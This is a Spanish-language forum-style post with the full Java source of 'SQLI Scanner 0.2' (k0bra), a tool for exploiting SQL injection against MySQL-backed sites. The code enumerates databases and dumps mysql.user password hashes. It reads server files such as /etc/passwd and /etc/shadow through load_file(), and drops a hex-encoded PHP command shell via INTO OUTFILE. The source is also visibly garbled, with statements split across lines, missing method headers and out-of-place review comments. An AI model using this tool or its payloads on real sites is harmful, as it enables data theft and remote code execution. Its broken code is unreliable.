Traducción completa de este simple programa para escanear páginas vulnerables a SQLi, llamado k0bra, que había hecho antiguamente en Perl.
Con las siguientes opciones :
- Comprobar vulnerabilidad
- Buscar número de columnas
- Buscar automáticamente el número para mostrar datos
- Mostrar tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar información sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
Un ejemplo de uso :
-- == SQLI Scanner 0.2 == --
[+] Page :
http://localhost/sql.php?id=
[+] Checking ...
[+] Scanning ...
[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
[Limit] : The site has 3 columns
[Data] : The number 1 print data
-- == OPTIONS == --
--== information_schema.tables ==--
[1] : Show tables
[2] : Show columns
[3] : Show DBS
[4] : Show tables with other DB
[5] : Show columns with other DB
--== mysql.user ==--
[6] : Show users
--== Others ==--
[7] : Fuzzing files with load_file
[8] : Read a file with load_file
[9] : Dump
[10] : Informacion of the server
[11] : Create a shell with into outfile
[12] : Show Log
[13] : Exit
[Option] :
10
[+] Searching informaion ...
[+] DB Version : 5.5.20-log
[+] DB Name : hackman
[+] Username : root@localhost
[+] information_schema : on
[+] mysqluser : on
[-] load_file : off
[+] Finished
El código es el siguiente:
// -- == -- == -- == ---- ==
// SQLI Scanner 0.2 ||
// -- == -- == -- == ---- ==
// (C) Doddy Hackman 2013 ||
// -- == -- == -- == ---- ==
import java.util.Scanner;
import java.io.*;
import java.net.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class Main {
Scanner host
= new Scanner
(System.
in);
installer();
System.
out.
println("\n\n-- == SQLI Scanner 0.2 == --\n\n"); System.
out.
println("[+] Page : "); target = host.nextLine();
scan(target);
//schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers");
//getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman");
//getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers");
//mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password");
//fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt");
//intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/");
}
while (true) {
System.
out.
println("\n-- == OPTIONS == --\n"); System.
out.
println("--== information_schema.tables ==--"); System.
out.
println("[1] : Show tables"); System.
out.
println("[2] : Show columns"); System.
out.
println("[3] : Show DBS"); System.
out.
println("[4] : Show tables with other DB"); System.
out.
println("[5] : Show columns with other DB"); System.
out.
println("--== mysql.user ==--"); System.
out.
println("[6] : Show users"); System.
out.
println("--== Others ==--"); System.
out.
println("[7] : Fuzzing files with load_file"); System.
out.
println("[8] : Read a file with load_file"); System.
out.
println("[9] : Dump"); System.
out.
println("[10] : Informacion of the server"); System.
out.
println("[11] : Create a shell with into outfile"); System.
out.
println("[12] : Show Log"); System.
out.
println("[13] : Exit");
int op;
Scanner host
= new Scanner
(System.
in); System.
out.
println("\n[Option] :"); op = host.nextInt();
if (op == 1) {
schematables(urla);
continuar();
} else if (op == 2) {
Scanner a
= new Scanner
(System.
in); System.
out.
println("\n[+] Table : "); coler = a.nextLine();
schemacolumns(urla, coler);
continuar();
} else if (op == 3) {
getdbs(urla);
continuar();
} else if (op == 4) {
Scanner a
= new Scanner
(System.
in); System.
out.
println("\n[+] DB : "); tabler = a.nextLine();
getablesbydb(urla, tabler);
continuar();
} else if (op == 5) {
Scanner a
= new Scanner
(System.
in); System.
out.
println("\n[+] DB : "); dber = a.nextLine();
Scanner b
= new Scanner
(System.
in); System.
out.
println("\n[+] Table : "); tablerx = a.nextLine();
getcolbydb(urla, dber, tablerx);
continuar();
} else if (op == 6) {
mysqluser(urla);
continuar();
} else if (op == 7) {
fuzzfiles(urla);
continuar();
} else if (op == 8) {
Scanner f
= new Scanner
(System.
in); System.
out.
println("\n[+] File : "); ar = f.nextLine();
openfile(urla, ar);
continuar();
} else if (op == 9) {
Scanner m
= new Scanner
(System.
in); System.
out.
println("\n[+] Table : "); a = m.nextLine();
Scanner n
= new Scanner
(System.
in); System.
out.
println("\n[+] Column 1 : "); b = n.nextLine();
Scanner l
= new Scanner
(System.
in); System.
out.
println("\n[+] Column 2 : "); c = l.nextLine();
dumper(urla, a, b, c);
continuar();
} else if (op == 10) {
details(urla);
continuar();
} else if (op == 11) {
Scanner m
= new Scanner
(System.
in); System.
out.
println("\n[+] Full Path Discloure : "); b = m.nextLine();
Scanner n
= new Scanner
(System.
in); System.
out.
println("\n[+] Directory to test : "); c = n.nextLine();
intofile(urla, b, c);
continuar();
} else if (op == 12) {
ruta
= System.
getProperty("user.dir") + "/logs/" + h.
getHost() + ".txt";
System.
out.
println("\n[+] Check logs in : " + ruta
); continuar();
} else if (op == 13) {
System.
out.
println("\n-- == (C) Doddy Hackman 2013 == --"); continuar();
} else {
System.
out.
println("\n[-] Bad Option\n"); continuar();
}
}
}
/**
 * Prints the "[+] Finished" banner and blocks until the user presses Enter,
 * so the output of the previous menu action stays on screen before the menu
 * is redrawn.
 *
 * @throws Exception declared for symmetry with the other menu helpers; nothing
 *                   in this body throws a checked exception
 */
private static void continuar() throws Exception {
    System.out.println("\n[+] Finished\n");
    // Read and discard one line; the Scanner is deliberately not closed,
    // because closing it would also close System.in for later menu reads.
    Scanner pause = new Scanner(System.in);
    pause.nextLine();
}
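/**
 * Makes sure the directory referenced by {@code crear} exists before any log
 * file is written into it.
 * <p>
 * NOTE(review): {@code crear} is declared elsewhere in this class and is not
 * visible here; from the {@code isDirectory()}/{@code mkdirs()} calls it is
 * presumably a {@code java.io.File} pointing at the logs folder — confirm.
 * {@code File.mkdirs()} reports failure only through its return value; the
 * original ignored it, so a missing directory surfaced later as an unrelated
 * error on the first log write.
 *
 * @throws IOException if the directory is still missing after the create attempt
 * @throws Exception   kept in the signature for compatibility with callers
 */
private static void installer() throws Exception {
    if (crear.isDirectory()) {
        return; // already present, nothing to do
    }
    // Re-check after mkdirs(): it returns false when the directory was created
    // concurrently by someone else, which is not a failure for our purposes.
    if (!crear.mkdirs() && !crear.isDirectory()) {
        throw new IOException("Could not create log directory: " + crear);
    }
}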
linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
lugar = fpd + "/cmd.php";
lugardos = dir + "/cmd.php";
System.
out.
println("\n[+] Checking ...\n");
webtest = "http://" + h.getHost() + lugardos;
Pattern uno = null;
Matcher dos = null;
web1 = urla.replace("hackman", linea);
formandoweb = web1 + "+into+outfile+'" + lugar + "'--";
code = toma(formandoweb);
code = toma(webtest);
uno = Pattern.compile("Mini Shell By Doddy");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[Shell UP] : " + webtest
); savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n");
} else {
System.
out.
println("[-] Error"); }
}
Pattern uno = null;
Matcher dos = null;
archivo = encodehex(file);
web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");
System.
out.
println("\n[+] Reading ...\n");
code = toma(web1);
uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] File Found : " + file
); System.
out.
println("\n[Source Start]\n"); System.
out.
println(dos.
group(1)); System.
out.
println("\n[Source End]\n");
savefile(urla, "\r\n" + "[+] File Found : " + file);
savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
savefile(urla, dos.group(1));
savefile(urla, "\r\n" + "[Source End]" + "\r\n");
} else {
System.
out.
println("[-] Not Found"); }
}
String[] archivos
= {"c:/test.txt",
"C:/xampp/htdocs/aca.txt",
"C:/xampp/htdocs/aca.txt",
"C:/xampp/htdocs/admin.php",
"C:/xampp/htdocs/leer.txt",
"../../../boot.ini",
"../../../../boot.ini",
"../../../../../boot.ini",
"../../../../../../boot.ini",
"/etc/passwd",
"/etc/shadow",
"/etc/shadow~",
"/etc/hosts",
"/etc/motd",
"/etc/apache/apache.conf",
"/etc/fstab",
"/etc/apache2/apache2.conf",
"/etc/apache/httpd.conf",
"/etc/httpd/conf/httpd.conf",
"/etc/apache2/httpd.conf",
"/etc/apache2/sites-available/default",
"/etc/mysql/my.cnf",
"/etc/my.cnf",
"/etc/sysconfig/network-scripts/ifcfg-eth0",
"/etc/redhat-release",
"/etc/httpd/conf.d/php.conf",
"/etc/pam.d/proftpd",
"/etc/phpmyadmin/config.inc.php",
"/var/www/config.php",
"/etc/httpd/logs/error_log",
"/etc/httpd/logs/error.log",
"/etc/httpd/logs/access_log",
"/etc/httpd/logs/access.log",
"/var/log/apache/error_log",
"/var/log/apache/error.log",
"/var/log/apache/access_log",
"/var/log/apache/access.log",
"/var/log/apache2/error_log",
"/var/log/apache2/error.log",
"/var/log/apache2/access_log",
"/var/log/apache2/access.log",
"/var/www/logs/error_log",
"/var/www/logs/error.log",
"/var/www/logs/access_log",
"/var/www/logs/access.log",
"/usr/local/apache/logs/error_log",
"/usr/local/apache/logs/error.log",
"/usr/local/apache/logs/access_log",
"/usr/local/apache/logs/access.log",
"/var/log/error_log",
"/var/log/error.log",
"/var/log/access_log",
"/var/log/access.log",
"/etc/group",
"/etc/security/group",
"/etc/security/passwd",
"/etc/security/user",
"/etc/security/environ",
"/etc/security/limits",
"/usr/lib/security/mkuser.default",
"/apache/logs/access.log",
"/apache/logs/error.log",
"/etc/httpd/logs/acces_log",
"/etc/httpd/logs/acces.log",
"/var/log/httpd/access_log",
"/var/log/httpd/error_log",
"/apache2/logs/error.log",
"/apache2/logs/access.log",
"/logs/error.log",
"/logs/access.log",
"/usr/local/apache2/logs/access_log",
"/usr/local/apache2/logs/access.log",
"/usr/local/apache2/logs/error_log",
"/usr/local/apache2/logs/error.log",
"/var/log/httpd/access.log",
"/var/log/httpd/error.log",
"/opt/lampp/logs/access_log",
"/opt/lampp/logs/error_log",
"/opt/xampp/logs/access_log",
"/opt/xampp/logs/error_log",
"/opt/lampp/logs/access.log",
"/opt/lampp/logs/error.log",
"/opt/xampp/logs/access.log",
"/opt/xampp/logs/error.log",
"C:/ProgramFiles/ApacheGroup/Apache/logs/access.log",
"C:/ProgramFiles/ApacheGroup/Apache/logs/error.log",
"/usr/local/apache/conf/httpd.conf",
"/usr/local/apache2/conf/httpd.conf",
"/etc/apache/conf/httpd.conf",
"/usr/local/etc/apache/conf/httpd.conf",
"/usr/local/apache/httpd.conf",
"/usr/local/apache2/httpd.conf",
"/usr/local/httpd/conf/httpd.conf",
"/usr/local/etc/apache2/conf/httpd.conf",
"/usr/local/etc/httpd/conf/httpd.conf",
"/usr/apache2/conf/httpd.conf",
"/usr/apache/conf/httpd.conf",
"/usr/local/apps/apache2/conf/httpd.conf",
"/usr/local/apps/apache/conf/httpd.conf",
"/etc/apache2/conf/httpd.conf",
"/etc/http/conf/httpd.conf",
"/etc/httpd/httpd.conf",
"/etc/http/httpd.conf",
"/etc/httpd.conf",
"/opt/apache/conf/httpd.conf",
"/opt/apache2/conf/httpd.conf",
"/var/www/conf/httpd.conf",
"/private/etc/httpd/httpd.conf",
"/private/etc/httpd/httpd.conf.default",
"/Volumes/webBackup/opt/apache2/conf/httpd.conf",
"/Volumes/webBackup/private/etc/httpd/httpd.conf",
"/Volumes/webBackup/private/etc/httpd/httpd.conf.default",
"C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf",
"C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf",
"C:/ProgramFiles/xampp/apache/conf/httpd.conf",
"/usr/local/php/httpd.conf.php",
"/usr/local/php4/httpd.conf.php",
"/usr/local/php5/httpd.conf.php",
"/usr/local/php/httpd.conf",
"/usr/local/php4/httpd.conf",
"/usr/local/php5/httpd.conf",
"/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf",
"/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf",
"/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf",
"/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php",
"/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php",
"/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php",
"/usr/local/etc/apache/vhosts.conf",
"/etc/php.ini",
"/bin/php.ini",
"/etc/httpd/php.ini",
"/usr/lib/php.ini",
"/usr/lib/php/php.ini",
"/usr/local/etc/php.ini",
"/usr/local/lib/php.ini",
"/usr/local/php/lib/php.ini",
"/usr/local/php4/lib/php.ini",
"/usr/local/php5/lib/php.ini",
"/usr/local/apache/conf/php.ini",
"/etc/php4.4/fcgi/php.ini",
"/etc/php4/apache/php.ini",
"/etc/php4/apache2/php.ini",
"/etc/php5/apache/php.ini",
"/etc/php5/apache2/php.ini",
"/etc/php/php.ini",
"/etc/php/php4/php.ini",
"/etc/php/apache/php.ini",
"/etc/php/apache2/php.ini",
"/web/conf/php.ini",
"/usr/local/Zend/etc/php.ini",
"/opt/xampp/etc/php.ini",
"/var/local/www/conf/php.ini",
"/etc/php/cgi/php.ini",
"/etc/php4/cgi/php.ini",
"/etc/php5/cgi/php.ini",
"c:/php5/php.ini",
"c:/php4/php.ini",
"c:/php/php.ini",
"c:/PHP/php.ini",
"c:/WINDOWS/php.ini",
"c:/WINNT/php.ini",
"c:/apache/php/php.ini",
"c:/xampp/apache/bin/php.ini",
"c:/NetServer/bin/stable/apache/php.ini",
"c:/home2/bin/stable/apache/php.ini",
"c:/home/bin/stable/apache/php.ini",
"/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini",
"/usr/local/cpanel/logs",
"/usr/local/cpanel/logs/stats_log",
"/usr/local/cpanel/logs/access_log",
"/usr/local/cpanel/logs/error_log",
"/usr/local/cpanel/logs/license_log",
"/usr/local/cpanel/logs/login_log",
"/var/cpanel/cpanel.config",
"/var/log/mysql/mysql-bin.log",
"/var/log/mysql.log",
"/var/log/mysqlderror.log",
"/var/log/mysql/mysql.log",
"/var/log/mysql/mysql-slow.log",
"/var/mysql.log",
"/var/lib/mysql/my.cnf",
"C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err",
"C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log",
"C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err",
"C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log",
"C:/ProgramFiles/MySQL/data/hostname.err",
"C:/ProgramFiles/MySQL/data/mysql.log",
"C:/ProgramFiles/MySQL/data/mysql.err",
"C:/ProgramFiles/MySQL/data/mysql-bin.log",
"C:/MySQL/data/hostname.err",
"C:/MySQL/data/mysql.log",
"C:/MySQL/data/mysql.err",
"C:/MySQL/data/mysql-bin.log",
"C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini",
"C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf",
"C:/ProgramFiles/MySQL/my.ini",
"C:/ProgramFiles/MySQL/my.cnf",
"C:/MySQL/my.ini",
"C:/MySQL/my.cnf",
"/etc/logrotate.d/proftpd",
"/www/logs/proftpd.system.log",
"/var/log/proftpd",
"/etc/proftp.conf",
"/etc/protpd/proftpd.conf",
"/etc/vhcs2/proftpd/proftpd.conf",
"/etc/proftpd/modules.conf",
"/var/log/vsftpd.log",
"/etc/vsftpd.chroot_list",
"/etc/logrotate.d/vsftpd.log",
"/etc/vsftpd/vsftpd.conf",
"/etc/vsftpd.conf",
"/etc/chrootUsers",
"/var/log/xferlog",
"/var/adm/log/xferlog",
"/etc/wu-ftpd/ftpaccess",
"/etc/wu-ftpd/ftphosts",
"/etc/wu-ftpd/ftpusers",
"/usr/sbin/pure-config.pl",
"/usr/etc/pure-ftpd.conf",
"/etc/pure-ftpd/pure-ftpd.conf",
"/usr/local/etc/pure-ftpd.conf",
"/usr/local/etc/pureftpd.pdb",
"/usr/local/pureftpd/etc/pureftpd.pdb",
"/usr/local/pureftpd/sbin/pure-config.pl",
"/usr/local/pureftpd/etc/pure-ftpd.conf",
"/etc/pure-ftpd/pure-ftpd.pdb",
"/etc/pureftpd.pdb",
"/etc/pureftpd.passwd",
"/etc/pure-ftpd/pureftpd.pdb",
"/var/log/pure-ftpd/pure-ftpd.log",
"/logs/pure-ftpd.log",
"/var/log/pureftpd.log",
"/var/log/ftp-proxy/ftp-proxy.log",
"/var/log/ftp-proxy",
"/var/log/ftplog",
"/etc/logrotate.d/ftp",
"/etc/ftpchroot",
"/etc/ftphosts",
"/var/log/exim_mainlog",
"/var/log/exim/mainlog",
"/var/log/maillog",
"/var/log/exim_paniclog",
"/var/log/exim/paniclog",
"/var/log/exim/rejectlog",
"/var/log/exim_rejectlog"};
Pattern uno = null;
Matcher dos = null;
System.
out.
println("\n[+] Searching files with load_file() ....\n");
for (int count = 0; count < archivos.length; count++) {
archivo = encodehex(archivos[count]);
web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");
code = toma(web1);
uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] File Found : " + archivos
[count
]); System.
out.
println("\n[Source Start]\n"); System.
out.
println(dos.
group(1)); System.
out.
println("\n[Source End]\n");
savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]);
savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
savefile(urla, dos.group(1));
savefile(urla, "\r\n" + "[Source End]" + "\r\n");
}
}
}
int x;
Pattern uno = null;
Matcher dos = null;
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");
code = toma(web1 + "+from+" + tabla + "--");
System.
out.
println("\n[+] Getting Values ...");
uno = Pattern.compile("K0BRA(.*?)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] Values Founds : " + dos.
group(1)); savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] " + col1
+ " : " + dos.
group(1)); System.
out.
println("[+] " + col2
+ " : " + dos.
group(2));
savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1));
savefile(urla, "[+] " + col2 + " : " + dos.group(2));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
int x;
Pattern uno = null;
Matcher dos = null;
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");
System.
out.
println("\n[+] Searching mysql.user ....");
code = toma(web1 + "+from+mysql.user--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] Users Found : " + dos.
group(1));
savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] Host : " + dos.
group(1)); System.
out.
println("[+] Username : " + dos.
group(2)); System.
out.
println("[+] Password : " + dos.
group(3));
savefile(urla, "\r\n" + "[+] Host : " + dos.group(1));
savefile(urla, "[+] Username : " + dos.group(2));
savefile(urla, "[+] Password : " + dos.group(3));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
int x;
Pattern uno = null;
Matcher dos = null;
dbf = encodehex(db);
table = encodehex(tab);
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");
System.
out.
println("\n[+] Getting Columns ....");
code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] Columns Found : " + dos.
group(1) + "\n");
savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] Column Found : " + dos.
group(1)); savefile(urla, "[+] Column Found : " + dos.group(1));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
int x;
Pattern uno = null;
Matcher dos = null;
data = encodehex(db);
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");
System.
out.
println("\n[+] Getting Tables ....");
code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] Tables Found : " + dos.
group(1) + "\n"); savefile(urla, "\r\n" + "[DB] : " + db + "\r\n");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] Table Found : " + dos.
group(1)); savefile(urla, "[+] Table Found : " + dos.group(1));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
int x;
Pattern uno = null;
Matcher dos = null;
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");
System.
out.
println("\n[+] Getting DBS ....");
code = toma(web1 + "+from+information_schema.schemata--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] DBS Found : " + dos.
group(1) + "\n");
savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] DB Found : " + dos.
group(1)); savefile(urla, "[+] DB Found : " + dos.group(1));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
int x;
Pattern uno = null;
Matcher dos = null;
tablexa = encodehex(nombre);
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");
System.
out.
println("\n[+] Getting columns ....");
code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] Columns Found : " + dos.
group(1) + "\n");
savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] Column Found : " + dos.
group(1)); savefile(urla, "[+] Column Found : " + dos.group(1));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
int x;
Pattern uno = null;
Matcher dos = null;
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");
System.
out.
println("\n[+] Getting tables ....\n");
code = toma(web1 + "+from+information_schema.tables--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] Tables Found : " + dos.
group(1) + "\n");
savefile(urla, "");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] Table Found : " + dos.
group(1)); savefile(urla, "[+] Table Found : " + dos.group(1));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
Pattern uno = null;
Matcher dos = null;
target = urla;
System.
out.
println("\n[+] Checking ...\n");
codex = toma(target + "-1+union+select+666--");
uno = Pattern.compile("The used SELECT statements have a different number of columns");
dos = uno.matcher(codex);
if (dos.find()) {
System.
out.
println("[+] Scanning ...\n");
int x;
urlfinal = "";
formariny = "";
for (x = 1; x <= 5; x = x + 1) {
//urlfinal = urlfinal+x+",";
urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
formariny = formariny + x + ",";
otrofinal = urlfinal;
otroformar = formariny;
otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
otroformar = otroformar.substring(0, otroformar.length() - 1);
code = toma(target + "-1+union+select+" + otrofinal);
uno = Pattern.compile("RATSXPDOWN(\\d+)");
dos = uno.matcher(code);
if (dos.find()) {
otroformar = otroformar.replace(dos.group(1), "hackman");
link = target + "-1+union+select+" + otroformar;
System.
out.
println("[Target] : " + link
); System.
out.
println("[Limit] : The site has " + x
+ " columns"); System.
out.
println("[Data] : The number " + dos.
group(1) + " print data");
savefile(link, "\r\n" + "[Target] : " + link);
savefile(link, "[Limit] : The site has " + x + " columns");
savefile(link, "[Data] : The number " + dos.group(1) + " print data");
manejo(link);
}
}
System.
out.
println("[-] Error"); } else {
System.
out.
println("[-] Not vulnerable"); }
}
Pattern uno = null;
Matcher dos = null;
concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";
urla = urla.replace("hackman", concat);
System.
out.
println("\n[+] Searching informaion ...\n");
code = toma(urla);
uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] DB Version : " + dos.
group(1)); System.
out.
println("[+] DB Name : " + dos.
group(2)); System.
out.
println("[+] Username : " + dos.
group(3));
savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1));
savefile(urla, "[+] DB Name : " + dos.group(2));
savefile(urla, "[+] Username : " + dos.group(3));
} else {
System.
out.
println("[-] Not found any data"); }
urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");
code = toma(urla + "+from+information_schema.tables--");
uno = Pattern.compile("ERTOR854");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] information_schema : on"); savefile(urla, "[+] information_schema : on");
} else {
System.
out.
println("[-] information_schema : off"); }
code = toma(urla + "+from+mysql.user--");
uno = Pattern.compile("ERTOR854");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] mysqluser : on"); savefile(urla, "[+] mysqluser : on");
} else {
System.
out.
println("[-] mysquser : off"); }
urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");
code = toma(urla);
uno = Pattern.compile("ERTOR854");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[-] load_file : on"); savefile(urla, "[-] load_file : on");
} else {
System.
out.
println("[-] load_file : off"); }
}
formar = "logs/" + h.getHost() + ".txt";
writer.write(texto + "\r\n");
writer.close();
}
hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
while ((re = nave.readLine()) != null) {
conte.append(re);
}
nave.close();
return conte.toString();
}
//Thanks to Katarina Majetic
//Based on http://www.dzone.com/snippets/encode-string-hex
byte[] z = text.getBytes();
int n;
int a = z.length;
int u;
for (n = 0; n < a; n++) {
u = z[n] & 0x000000FF;
h.append(l);
}
return "0x" + h.toString();
}
}
//The End ?